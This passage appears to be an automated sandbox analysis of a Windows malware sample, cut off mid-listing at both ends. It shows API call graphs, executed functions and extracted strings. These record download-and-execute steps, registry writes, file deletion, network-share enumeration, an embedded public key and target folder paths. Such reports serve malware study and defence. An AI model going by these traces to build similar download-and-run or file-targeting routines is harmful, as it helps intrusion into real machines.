40681 bb3a68 __alloc_osfhnd 40678->40681 40682 bb0e53 __lock_file 59 API calls 40678->40682 40680 bb3a5d 40679->40680 40918 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40680->40918 40681->40035 40684 bb3a82 40682->40684 40902 bb39cc 40684->40902 40688->40026 40689->40026 40690->40026 40694 bb1043 __alloc_osfhnd 40691->40694 40692 bb1056 40693 bb5208 __woutput_s_l 58 API calls 40692->40693 40695 bb105b 40693->40695 40694->40692 40696 bb1087 40694->40696 40740 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40695->40740 40710 bb8df4 40696->40710 40699 bb108c 40700 bb10a2 40699->40700 40701 bb1095 40699->40701 40702 bb10cc 40700->40702 40703 bb10ac 40700->40703 40704 bb5208 __woutput_s_l 58 API calls 40701->40704 40725 bb8f13 40702->40725 40705 bb5208 __woutput_s_l 58 API calls 40703->40705 40709 bb1066 __alloc_osfhnd @_EH4_CallFilterFunc@8 40704->40709 40705->40709 40709->40661 40711 bb8e00 __alloc_osfhnd 40710->40711 40712 bb8af7 __lock 58 API calls 40711->40712 40723 bb8e0e 40712->40723 40713 bb8e82 40742 bb8f0a 40713->40742 40714 bb8e89 40716 bb8cde __malloc_crt 58 API calls 40714->40716 40717 bb8e90 40716->40717 40717->40713 40746 bc263e InitializeCriticalSectionAndSpinCount 40717->40746 40718 bb8eff __alloc_osfhnd 40718->40699 40720 bb8b9f __mtinitlocknum 58 API calls 40720->40723 40721 bb0e92 __getstream 59 API calls 40721->40723 40722 bb8eb6 EnterCriticalSection 40722->40713 40723->40713 40723->40714 40723->40720 40723->40721 40745 bb0efc LeaveCriticalSection LeaveCriticalSection _doexit 40723->40745 40733 bb8f33 __wsetlocale_nolock 40725->40733 40726 bb8f4d 40727 bb5208 __woutput_s_l 58 API calls 40726->40727 40728 bb8f52 40727->40728 40751 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40728->40751 40730 bb10d7 40741 bb10f9 LeaveCriticalSection LeaveCriticalSection _vfwprintf_helper 40730->40741 40731 bb916b 40748 bcc214 40731->40748 40733->40726 40733->40733 40739 bb9108 40733->40739 40752 bcc232 60 API calls 2 library calls 40733->40752 40735 bb9101 40735->40739 40753 bcc232 60 API calls 2 library calls 40735->40753 40737 bb9120 40737->40739 40754 bcc232 60 API calls 2 library calls 40737->40754 40739->40726 40739->40731 40740->40709 40741->40709 40747 bb8c81 LeaveCriticalSection 40742->40747 40744 bb8f11 40744->40718 40745->40723 40746->40722 40747->40744 40755 bcb9f8 40748->40755 40750 bcc22d 40750->40730 40751->40730 40752->40735 40753->40737 40754->40739 40756 bcba04 __alloc_osfhnd 40755->40756 40757 bcba1a 40756->40757 40759 bcba50 40756->40759 40758 bb5208 __woutput_s_l 58 API calls 40757->40758 40760 bcba1f 40758->40760 40766 bcbac1 40759->40766 40840 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40760->40840 40765 bcba29 __alloc_osfhnd 40765->40750 40767 bcbae1 40766->40767 40842 bd7f50 40767->40842 40770 bcc213 40771 bcbafd 40772 bcbb37 40771->40772 40777 bcbb5a 40771->40777 40787 bcbc34 40771->40787 40873 bb51d4 58 API calls __getptd_noexit 40772->40873 40774 bcbb3c 40775 bb5208 __woutput_s_l 58 API calls 40774->40775 40776 bcbb49 40775->40776 40874 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40776->40874 40778 bcbc18 40777->40778 40786 bcbbf6 40777->40786 40875 bb51d4 58 API calls __getptd_noexit 40778->40875 40781 bcba6c 40841 bcba95 LeaveCriticalSection __unlock_fhandle 40781->40841 40782 bcbc1d 40783 bb5208 __woutput_s_l 58 API calls 40782->40783 40784 bcbc2a 40783->40784 40876 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40784->40876 40849 bcb1c2 40786->40849 40888 bb42fd 8 API calls 2 library calls 40787->40888 40789 bcbcc4 40790 bcbcce 40789->40790 40791 bcbcf1 40789->40791 40877 bb51d4 58 API calls __getptd_noexit 40790->40877 40867 bcb88d 40791->40867 40794 bcbcd3 40796 bb5208 __woutput_s_l 58 API calls 40794->40796 40795 bcbd91 GetFileType 40799 bcbd9c GetLastError 40795->40799 40800 bcbdde 40795->40800 40798 bcbcdd 40796->40798 40797 bcbd5f GetLastError 40878 bb51e7 58 API calls 3 library calls 40797->40878 40804 bb5208 __woutput_s_l 58 API calls 40798->40804 40879 bb51e7 58 API calls 3 library calls 40799->40879 40880 bcb56e 59 API calls 2 library calls 40800->40880 40804->40781 40805 bcbdc3 CloseHandle 40807 bcbd84 40805->40807 40808 bcbdd1 40805->40808 40806 bcb88d ___createFile 3 API calls 40809 bcbd54 40806->40809 40812 bb5208 __woutput_s_l 58 API calls 40807->40812 40809->40795 40809->40797 40812->40787 40815 bcbdfc 40840->40765 40841->40765 40843 bd7f6f 40842->40843 40844 bd7f5a 40842->40844 40843->40771 40845 bb5208 __woutput_s_l 58 API calls 40844->40845 40846 bd7f5f 40845->40846 40889 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40846->40889 40848 bd7f6a 40848->40771 40850 bcb1ce __alloc_osfhnd 40849->40850 40851 bb8b9f __mtinitlocknum 58 API calls 40850->40851 40852 bcb1df 40851->40852 40853 bb8af7 __lock 58 API calls 40852->40853 40854 bcb1e4 __alloc_osfhnd 40852->40854 40860 bcb1f2 40853->40860 40854->40789 40856 bcb2d2 40857 bb8c96 __calloc_crt 58 API calls 40856->40857 40861 bcb2db 40857->40861 40858 bb8af7 __lock 58 API calls 40858->40860 40859 bcb272 EnterCriticalSection 40859->40860 40862 bcb282 LeaveCriticalSection 40859->40862 40860->40856 40860->40858 40860->40859 40866 bcb340 40860->40866 40890 bc263e InitializeCriticalSectionAndSpinCount 40860->40890 40891 bcb29a LeaveCriticalSection _doexit 40860->40891 40863 bcb134 ___lock_fhandle 59 API calls 40861->40863 40861->40866 40862->40860 40863->40866 40892 bcb362 LeaveCriticalSection _doexit 40866->40892 40868 bcb898 ___crtIsPackagedApp 40867->40868 40869 bcb89c GetModuleHandleW GetProcAddress 40868->40869 40870 bcb8f3 CreateFileW 40868->40870 40871 bcb8b9 40869->40871 40872 bcb911 40870->40872 40871->40872 40872->40795 40872->40797 40872->40806 40873->40774 40874->40781 40875->40782 40876->40787 40877->40794 40878->40807 40879->40805 40880->40815 40888->40770 40889->40848 40890->40860 40891->40860 40892->40854 40893->40674 40895 bb0e63 40894->40895 40896 bb0e85 EnterCriticalSection 40894->40896 40895->40896 40897 bb0e6b 40895->40897 40898 bb0e7b 40896->40898 40899 bb8af7 __lock 58 API calls 40897->40899 40898->40671 40899->40898 40900->40671 40901->40674 40903 bb39db 40902->40903 40904 bb39ef 40902->40904 40905 bb5208 __woutput_s_l 58 API calls 40903->40905 40906 bb39eb 40904->40906 40907 bb836b __flush 78 API calls 40904->40907 40908 bb39e0 40905->40908 40919 bb3aa7 LeaveCriticalSection LeaveCriticalSection _vfwprintf_helper 40906->40919 40909 bb39fb 40907->40909 40920 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40908->40920 40921 bc0bbf 58 API calls _free 40909->40921 40912 bb3a03 40913 bb816b __fclose_nolock 58 API calls 40912->40913 40914 bb3a09 40913->40914 40922 bc0a4a 63 API calls 5 library calls 40914->40922 40916 bb3a0f 40916->40906 40917 bb0bed _free 58 API calls 40916->40917 40917->40906 40918->40681 40919->40681 40920->40906 40921->40912 40922->40916 40924 ba5ab8 40923->40924 40925 ba59e8 40923->40925 41002 bdf26c 59 API calls 3 library calls 40924->41002 40927 ba5ac2 40925->40927 40928 ba5a02 40925->40928 40929 bdf23e 59 API calls 40927->40929 40930 ba5acc 40928->40930 40931 ba5a1a 40928->40931 40939 ba5a2a ___check_float_string 40928->40939 40929->40930 40932 bdf23e 59 API calls 40930->40932 40933 ba6950 59 API calls 40931->40933 40931->40939 40942 ba5ad6 40932->40942 40933->40939 40934 ba5b36 40935 ba5b49 40934->40935 40936 ba5bf1 40934->40936 40938 ba5bfb 40935->40938 40940 ba5b61 40935->40940 40946 ba5b71 ___check_float_string 40935->40946 40937 bdf23e 59 API calls 40936->40937 40937->40938 40941 bdf23e 59 API calls 40938->40941 40939->40054 40944 ba6950 59 API calls 40940->40944 40940->40946 40943 ba5c05 40941->40943 40942->40934 40945 ba5b15 40942->40945 40944->40946 40947 ba59d0 59 API calls 40945->40947 40946->40054 40948 ba5b30 40947->40948 40948->40054 41002->40927 41133 bb3f74 41090->41133 41093 baf196 Sleep 41094 baf94b 41093->41094 41095 baf1c1 41093->41095 41097 ba4690 59 API calls 41094->41097 41096 ba0a50 65 API calls 41095->41096 41108 baf1cd 41096->41108 41098 baf97a 41097->41098 41193 ba0160 89 API calls 5 library calls 41098->41193 41099 baf216 41101 ba5c10 59 API calls 41099->41101 41102 baf274 41101->41102 41136 b9f730 41102->41136 41104 baf9c1 SendMessageW 41106 baf9e1 41104->41106 41130 baf8af 41104->41130 41105 bb0235 ___get_qualified_locale 60 API calls 41105->41108 41106->41130 41107 ba11c0 170 API calls 41109 baf987 41107->41109 41108->41099 41108->41105 41109->41104 41109->41107 41110 ba1ab0 PeekMessageW DispatchMessageW PeekMessageW 41109->41110 41110->41109 41111 ba5c10 59 API calls 41113 baf281 41111->41113 41112 ba5c10 59 API calls 41114 baf392 41112->41114 41113->41111 41113->41114 41117 b9f730 192 API calls 41113->41117 41114->41112 41118 b9f730 192 API calls 41114->41118 41121 baf52c 41114->41121 41117->41113 41118->41114 41134 bb5007 _GetLcidFromCountry 58 API calls 41133->41134 41135 baf16a Sleep 41134->41135 41135->41093 41135->41130 41137 ba1ab0 3 API calls 41136->41137 41148 b9f765 41137->41148 41138 b9f8b5 41139 ba4690 59 API calls 41138->41139 41140 b9f8ea PathFindFileNameW 41139->41140 41142 b9f923 41140->41142 41141 ba4690 59 API calls 41141->41148 41142->41142 41146 ba5ae0 59 API calls 41146->41148 41147 bb0235 ___get_qualified_locale 60 API calls 41147->41148 41148->41138 41148->41141 41148->41146 41148->41147 41163 b9f927 41148->41163 41163->41113 41193->41109 41297 ba0bd0 WNetOpenEnumW 41294->41297 41296 bafd95 SendMessageW 41298 ba0c1c 41297->41298 41299 ba0c33 GlobalAlloc 41297->41299 41298->41296 41304 ba0c45 _memset 41299->41304 41300 ba0c51 WNetEnumResourceW 41301 ba0ea3 WNetCloseEnum 41300->41301 41300->41304 41301->41296 41302 ba50c0 59 API calls 41302->41304 41303 ba5c10 59 API calls 41303->41304 41304->41300 41304->41302 41304->41303 41305 ba0bd0 59 API calls 41304->41305 41306 ba8fd0 59 API calls 41304->41306 41305->41304 41306->41304 41308 bbf7c0 __write_nolock 41307->41308 41309 bae6b6 timeGetTime 41308->41309 41310 bb3f74 58 API calls 41309->41310 41311 bae6cc 41310->41311 41422 b9c6a0 RegOpenKeyExW 41311->41422 41314 bae72e InternetOpenW 41333 bae6d4 _memset _strstr _wcsstr 41314->41333 41315 ba5ae0 59 API calls 41315->41333 41316 baea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 41316->41333 41317 baea4c SHGetFolderPathA 41318 baea67 PathAppendA DeleteFileA 41317->41318 41317->41333 41318->41333 41320 baeada lstrlenA 41320->41333 41321 ba4690 59 API calls 41353 bae7be _memmove 41321->41353 41322 baee4d 41323 b9ef50 58 API calls 41322->41323 41328 baee5d 41323->41328 41324 ba2900 60 API calls 41324->41333 41326 ba3ff0 59 API calls 41326->41333 41327 baeb53 lstrcpyW 41329 baeb74 lstrlenA 41327->41329 41327->41333 41331 ba3ea0 59 API calls 41328->41331 41335 baeeb1 41328->41335 41332 bb0c62 _malloc 58 API calls 41329->41332 41330 ba59d0 59 API calls 41330->41333 41331->41328 41332->41333 41333->41314 41333->41315 41333->41316 41333->41317 41333->41320 41333->41322 41333->41324 41333->41326 41333->41327 41333->41329 41333->41330 41334 bae8f3 lstrcpyW 41333->41334 41336 bae943 InternetOpenUrlW InternetReadFile 41333->41336 41338 baeb99 MultiByteToWideChar lstrcpyW 41333->41338 41344 baec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 41333->41344 41346 baebf0 SHGetFolderPathA 41333->41346 41351 baecaa lstrlenA 41333->41351 41333->41353 41354 ba56d0 59 API calls 41333->41354 41359 baed1f lstrcpyW 41333->41359 41360 baed43 lstrlenA 41333->41360 41367 baed68 MultiByteToWideChar lstrcpyW lstrlenW 41333->41367 41372 baedc3 SHGetFolderPathA 41333->41372 41375 bb0bed 58 API calls _free 41333->41375 41427 b9c500 SHGetFolderPathA 41333->41427 41447 ba1b10 timeGetTime timeGetTime 41333->41447 41334->41333 41334->41336 41337 b9ef50 58 API calls 41335->41337 41339 bae9ec InternetCloseHandle InternetCloseHandle 41336->41339 41340 bae97c SHGetFolderPathA 41336->41340 41345 baeec1 41337->41345 41338->41333 41339->41353 41340->41339 41341 bae996 PathAppendA 41340->41341 41454 bb20b6 41341->41454 41343 bae93c lstrcatW 41343->41336 41344->41333 41347 ba3ea0 59 API calls 41345->41347 41352 baef12 41345->41352 41346->41333 41348 baec17 PathAppendA DeleteFileA 41346->41348 41347->41345 41348->41333 41349 bae9c4 lstrlenA 41457 bb2b02 80 API calls 3 library calls 41349->41457 41351->41333 41355 ba3ff0 59 API calls 41352->41355 41353->41321 41353->41333 41353->41339 41353->41343 41353->41349 41356 bb3a38 __fcloseall 83 API calls 41353->41356 41453 b9dd40 73 API calls 4 library calls 41353->41453 41354->41333 41357 baef3a 41355->41357 41356->41353 41358 ba2900 60 API calls 41357->41358 41361 baef45 lstrcpyW 41358->41361 41359->41333 41359->41360 41363 bb0c62 _malloc 58 API calls 41360->41363 41364 baef6a 41361->41364 41363->41333 41365 ba3ff0 59 API calls 41364->41365 41366 baef9f 41365->41366 41368 ba2900 60 API calls 41366->41368 41367->41333 41370 baedad lstrlenW 41367->41370 41369 baefac lstrcpyW 41368->41369 41374 baee44 41369->41374 41370->41333 41370->41374 41372->41333 41373 baedea PathAppendA DeleteFileA 41372->41373 41373->41333 41375->41333 41377 badbf6 __write_nolock 41376->41377 41378 ba3ff0 59 API calls 41377->41378 41379 badc31 41378->41379 41380 ba56d0 59 API calls 41379->41380 41381 badc82 41380->41381 41382 ba3ff0 59 API calls 41381->41382 41383 badcb1 41382->41383 41384 b9ecb0 60 API calls 41383->41384 41385 badcc5 41384->41385 41386 badcf0 LoadLibraryW GetProcAddress 41385->41386 41389 bae3d3 41385->41389 41387 ba3c40 59 API calls 41386->41387 41388 badd1a UuidCreate UuidToStringA 41387->41388 41391 badd84 41388->41391 41392 ba56d0 59 API calls 41391->41392 41393 badda7 RpcStringFreeA PathAppendA CreateDirectoryA 41392->41393 41394 ba84e0 59 API calls 41393->41394 41395 bade18 41394->41395 41396 ba3ff0 59 API calls 41395->41396 41397 bade4c 41396->41397 41398 ba2900 60 API calls 41397->41398 41399 bade5c 41398->41399 41400 ba3580 59 API calls 41399->41400 41420 bade73 _memset _wcsstr 41400->41420 41401 badeec InternetOpenA 41402 ba3ff0 59 API calls 41401->41402 41402->41420 41403 ba2900 60 API calls 41403->41420 41404 ba4690 59 API calls 41410 badf60 _memmove 41404->41410 41405 ba4690 59 API calls 41405->41420 41407 ba2840 60 API calls 41407->41420 41408 bae079 InternetOpenUrlA 41408->41420 41409 bae0e2 HttpQueryInfoW 41409->41420 41410->41404 41410->41420 41552 b9dd40 73 API calls 4 library calls 41410->41552 41411 ba3ff0 59 API calls 41411->41420 41412 ba3010 59 API calls 41412->41420 41413 bae1ec lstrcpyA PathAppendA 41413->41420 41414 ba56d0 59 API calls 41415 bae267 CreateFileA 41414->41415 41416 bae299 SetFilePointer 41415->41416 41415->41420 41416->41420 41417 bae2b1 InternetReadFile 41417->41420 41418 bae2dc WriteFile 41419 bae316 CloseHandle InternetCloseHandle InternetCloseHandle 41418->41419 41418->41420 41419->41420 41420->41389 41420->41401 41420->41403 41420->41405 41420->41407 41420->41408 41420->41409 41420->41410 41420->41411 41420->41412 41420->41413 41420->41414 41420->41417 41420->41418 41420->41419 41421 bae334 ShellExecuteA 41420->41421 41421->41420 41423 b9c6cc RegQueryValueExW 41422->41423 41424 b9c734 41422->41424 41425 b9c6fd RegCloseKey 41423->41425 41426 b9c70c RegSetValueExW RegCloseKey 41423->41426 41424->41333 41425->41333 41426->41424 41428 b9c52c PathAppendA 41427->41428 41429 b9c525 41427->41429 41430 bb20b6 125 API calls 41428->41430 41429->41333 41432 b9c550 41430->41432 41431 b9c559 41431->41333 41432->41431 41458 bb387f 85 API calls 5 library calls 41432->41458 41434 b9c56c 41459 bb3455 69 API calls 4 library calls 41434->41459 41436 b9c572 41460 bb0cf4 84 API calls 6 library calls 41436->41460 41438 b9c57a 41439 b9c5a5 41438->41439 41440 b9c589 41438->41440 41441 bb3a38 __fcloseall 83 API calls 41439->41441 41461 bb22f5 74 API calls __fread_nolock 41440->41461 41443 b9c5ab 41441->41443 41443->41333 41444 b9c593 41445 bb3a38 __fcloseall 83 API calls 41444->41445 41446 b9c599 41445->41446 41446->41333 41448 ba1b2f 41447->41448 41449 ba1b7f 41447->41449 41448->41449 41450 ba1b40 PeekMessageW 41448->41450 41452 ba1b58 DispatchMessageW PeekMessageW 41448->41452 41449->41333 41450->41448 41451 ba1b70 Sleep timeGetTime 41450->41451 41451->41449 41451->41450 41452->41448 41452->41451 41453->41353 41462 bb1ff2 41454->41462 41456 bb20c6 41456->41353 41457->41353 41458->41434 41459->41436 41460->41438 41461->41444 41465 bb1ffe __alloc_osfhnd 41462->41465 41463 bb2010 41464 bb5208 __woutput_s_l 58 API calls 41463->41464 41466 bb2015 41464->41466 41465->41463 41467 bb203d 41465->41467 41481 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 41466->41481 41469 bb8df4 __getstream 61 API calls 41467->41469 41470 bb2042 41469->41470 41471 bb204b 41470->41471 41472 bb2058 41470->41472 41473 bb5208 __woutput_s_l 58 API calls 41471->41473 41474 bb2081 41472->41474 41475 bb2061 41472->41475 41478 bb2020 __alloc_osfhnd @_EH4_CallFilterFunc@8 41473->41478 41482 bbb078 41474->41482 41476 bb5208 __woutput_s_l 58 API calls 41475->41476 41476->41478 41478->41456 41481->41478 41490 bbb095 41482->41490 41483 bbb0a9 41484 bb5208 __woutput_s_l 58 API calls 41483->41484 41485 bbb0ae 41484->41485 41500 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 41485->41500 41486 bbb2ac 41505 bcfba6 41486->41505 41488 bb208c 41499 bb20ae LeaveCriticalSection LeaveCriticalSection _vfwprintf_helper 41488->41499 41490->41483 41498 bbb250 41490->41498 41501 bcfbc4 58 API calls __mbsnbcmp_l 41490->41501 41492 bbb216 41492->41483 41502 bcfcf3 65 API calls __mbsnbicmp_l 41492->41502 41494 bbb249 41494->41498 41503 bcfcf3 65 API calls __mbsnbicmp_l 41494->41503 41496 bbb268 41496->41498 41504 bcfcf3 65 API calls __mbsnbicmp_l 41496->41504 41498->41483 41498->41486 41499->41478 41500->41488 41501->41492 41502->41494 41503->41496 41504->41498 41508 bcfa8f 41505->41508 41507 bcfbbf 41507->41488 41510 bcfa9b __alloc_osfhnd 41508->41510 41509 bcfab1 41511 bb5208 __woutput_s_l 58 API calls 41509->41511 41510->41509 41512 bcfae7 41510->41512 41513 bcfab6 41511->41513 41520 bcfb58 41512->41520 41519 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 41513->41519 41518 bcfac0 __alloc_osfhnd 41518->41507 41519->41518 41528 bb7970 41520->41528 41523 bcfb03 41527 bcfb2c LeaveCriticalSection __unlock_fhandle 41523->41527 41524 bcbac1 __wsopen_nolock 109 API calls 41525 bcfb92 41524->41525 41526 bb0bed _free 58 API calls 41525->41526 41526->41523 41527->41518 41529 bb797d 41528->41529 41530 bb7993 41528->41530 41532 bb5208 __woutput_s_l 58 API calls 41529->41532 41530->41529 41531 bb799a ___crtIsPackagedApp 41530->41531 41535 bb79a3 AreFileApisANSI 41531->41535 41536 bb79b0 MultiByteToWideChar 41531->41536 41533 bb7982 41532->41533 41549 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 41533->41549 41535->41536 41537 bb79ad 41535->41537 41538 bb79db 41536->41538 41539 bb79ca GetLastError 41536->41539 41537->41536 41541 bb8cde __malloc_crt 58 API calls 41538->41541 41550 bb51e7 58 API calls 3 library calls 41539->41550 41543 bb79e3 41541->41543 41542 bb798c 41542->41523 41542->41524 41543->41542 41544 bb79ea MultiByteToWideChar 41543->41544 41544->41542 41545 bb7a00 GetLastError 41544->41545 41551 bb51e7 58 API calls 3 library calls 41545->41551 41547 bb7a0c 41548 bb0bed _free 58 API calls 41547->41548 41548->41542 41549->41542 41550->41542 41551->41547 41552->41410 41554 bb7e1a __alloc_osfhnd 41553->41554 41555 bb8af7 __lock 51 API calls 41554->41555 41556 bb7e21 41555->41556 41557 bb7eda __cinit 41556->41557 41558 bb7e4f DecodePointer 41556->41558 41573 bb7f28 41557->41573 41558->41557 41560 bb7e66 DecodePointer 41558->41560 41566 bb7e76 41560->41566 41562 bb7f37 __alloc_osfhnd 41562->39750 41564 bb7e83 EncodePointer 41564->41566 41565 bb7f1f 41567 bb7b0b __mtinitlocknum 3 API calls 41565->41567 41566->41557 41566->41564 41568 bb7e93 DecodePointer EncodePointer 41566->41568 41571 bb7ea5 DecodePointer DecodePointer 41566->41571 41569 bb7f28 41567->41569 41568->41566 41570 bb7f35 41569->41570 41578 bb8c81 LeaveCriticalSection 41569->41578 41570->39750 41571->41566 41574 bb7f2e 41573->41574 41575 bb7f08 41573->41575 41579 bb8c81 LeaveCriticalSection 41574->41579 41575->41562 41577 bb8c81 LeaveCriticalSection 41575->41577 41577->41565 41578->41570 41579->41575

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00BA9F90 Relevance: 169.6, APIs: 65, Strings: 31, Instructions: 1565COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00B9CF10: _memset.LIBCMT ref: 00B9CF4A
                                                                                                                                                                          • Part of subcall function 00B9CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00B9CF5F
                                                                                                                                                                          • Part of subcall function 00B9CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00B9CFA6
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00BA9FC4
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA9FD2
                                                                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00BA9FDA
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA9FE4
                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00E5B7D0,?), ref: 00BAA0BB
                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BAA0C2
                                                                                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 00BAA161
                                                                                                                                                                          • Part of subcall function 00BA24E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00BA24FE
                                                                                                                                                                          • Part of subcall function 00BA24E0: GetLastError.KERNEL32 ref: 00BA2509
                                                                                                                                                                          • Part of subcall function 00BA24E0: CloseHandle.KERNEL32 ref: 00BA251C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                        • API String ID: 2957410896-1065278900
                                                                                                                                                                        • Opcode ID: d42a5c74886137734104f8e725125d7f5d0853758e1ae80d92a57886b797cf8b
                                                                                                                                                                        • Instruction ID: 73941414d16913fe58f7feb174d1db90b03984ebbd884bec1ab251982b1e4f32
                                                                                                                                                                        • Opcode Fuzzy Hash: d42a5c74886137734104f8e725125d7f5d0853758e1ae80d92a57886b797cf8b
                                                                                                                                                                        • Instruction Fuzzy Hash: 35D2C670508341AFDB14EF24C895B9FB7E4FF96704F0009ADF48597292EB719A49CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C11920 Relevance: 135.3, APIs: 49, Strings: 28, Instructions: 587libraryloadermemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 606 c11920-c119e0 call bbf7c0 GetVersionExA LoadLibraryA * 3 609 c119e2-c11a05 GetProcAddress * 2 606->609 610 c11a0b-c11a0d 606->610 609->610 611 c11a13-c11a15 610->611 612 c11aba-c11ac2 610->612 611->612 615 c11a1b-c11a31 NetStatisticsGet 611->615 613 c11ac4-c11ac5 FreeLibrary 612->613 614 c11acb-c11ad3 612->614 613->614 616 c11ad5-c11b0b GetProcAddress * 3 614->616 617 c11b0d 614->617 618 c11a33-c11a5d call bbf7c0 call bed550 615->618 619 c11a69-c11a85 NetStatisticsGet 615->619 620 c11b0f-c11b17 616->620 617->620 618->619 619->612 622 c11a87-c11aae call bbf7c0 call bed550 619->622 624 c11c0a-c11c12 620->624 625 c11b1d-c11b23 620->625 622->612 627 c11c14-c11c15 FreeLibrary 624->627 628 c11c1b-c11c22 624->628 625->624 630 c11b29-c11b2b 625->630 627->628 632 c11c31-c11c44 LoadLibraryA 628->632 633 c11c24-c11c2b call be49a0 628->633 630->624 635 c11b31-c11b42 630->635 638 c11d4b-c11d53 632->638 639 c11c4a-c11c82 GetProcAddress * 3 632->639 633->632 633->638 646 c11b45-c11b47 635->646 642 c11d59-c11e56 GetProcAddress * 12 638->642 643 c1223f-c12256 call c12470 GlobalMemoryStatus call bbf7c0 638->643 644 c11c84 639->644 645 c11caf-c11cb7 639->645 649 c12233-c12239 FreeLibrary 642->649 650 c11e5c-c11e63 642->650 670 c1225b-c122cd call bed550 GetCurrentProcessId call bbf7c0 call bed550 call bba77e 643->670 658 c11c86-c11cac call bbf7c0 call bed550 644->658 647 c11d06-c11d08 645->647 648 c11cb9-c11cc0 645->648 652 c11b49-c11b5d 646->652 653 c11b98-c11bb4 646->653 659 c11d0a-c11d3c call bbf7c0 call bed550 647->659 660 c11d3f-c11d45 FreeLibrary 647->660 654 c11cc2-c11cc9 648->654 655 c11ccb-c11ccd 648->655 649->643 650->649 656 c11e69-c11e70 650->656 672 c11b8a-c11b8c 652->672 673 c11b5f-c11b84 call bbf7c0 call bed550 652->673 653->624 668 c11bb6-c11bca 653->668 654->647 654->655 655->647 661 c11ccf-c11cde 655->661 656->649 663 c11e76-c11e7d 656->663 658->645 659->660 660->638 661->647 684 c11ce0-c11d03 call bbf7c0 call bed550 661->684 663->649 669 c11e83-c11e8a 663->669 691 c11bfc-c11bfe 668->691 692 c11bcc-c11bf6 call bbf7c0 call bed550 668->692 669->649 676 c11e90-c11e97 669->676 672->653 673->672 676->649 686 c11e9d-c11ea4 676->686 684->647 686->649 693 c11eaa-c11eb1 686->693 691->624 692->691 693->649 699 c11eb7-c11ebe 693->699 